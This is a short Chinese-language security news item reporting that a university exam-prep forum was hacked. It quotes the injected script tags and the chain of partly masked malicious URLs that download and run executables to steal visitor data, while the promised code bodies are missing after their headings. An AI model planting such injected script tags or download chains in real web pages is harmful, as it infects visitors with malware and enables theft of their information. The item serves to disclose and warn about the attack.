减小字体 增大字体
12月4日,人大考研论坛网站(http://www.rendaka****.cn)被黑客植入病毒,用户如果访问该网站,会被病毒感染。系统就会自动从恶意网站上下载并运行多个恶意程序,盗取用户信息。
该网站的主页里被插入如下代码:
插入代码:
<script src=http://sns***.com/pic></script><script src=http://taoz****.com/pic></script> <script src=http://zzs***.cn/reg></script>
1. http://sns***.com/pic地址失效 2. http://zzs***.cn/reg 地址失效 3. http://taoz****.com/pic插入框架代码:
(1).http://qqq.wss****.com/gm.htm加密网马代码:
下载文件: http://qqq.aishe****.com/down.exe
(2).http://www.foa***.info/ms44.htm?6326框架代码:
(1).88/881.htm关键脚本代码:
(2).88/***.htm加密网马代码:
(3).88/***.htm脚本代码:
bb.js关键脚本代码:
(3).http://aa.llsg****.com/ww/new05.htm?067?4框架代码:
(1). http://aa.lls****.com/aa/haha.htm加密网马,
下载http://down.lls****.com/bb/014.exe
(2). http://aa.lls****.com/aa/pps.htm加密网马代码:
(4).http://www.900***.info/xm30.htm?258框架代码:
(1).ee/ee1.htm关键脚本代码:
(2).ee/ee3.htm加密网马代码:
(3).ee/***.htm脚本代码:
(5).http://aa.lls****.com/ww/new263.htm?id=015框架代码:
(1). http://aa.lls****.com/aa/haha.htm 加密网马:下载http://down.lls****.com/bb/014.exe (2). http://aa.lls****.com/aa/pps.htm加密网马代码:
当用户访问http://www.rendaka****.cn时, 会调用以上恶意代码!
使系统自动下载以下文件到本地,并运行:
声 明: 西安网吧在线(Cn029.Com) 所发表的文章与图片仅代表作者本人观点,与本站立场无关, 也不构成任何建议。对本文有任何异议,请联络: webmaster@cn029.com 若文章内容侵犯了您的相关权益,请及时与我们联系,我们会及时处理,感谢您对本站的支持!
设为首页
加入收藏
联系我们
您当前的位置:
减小字体
增大字体
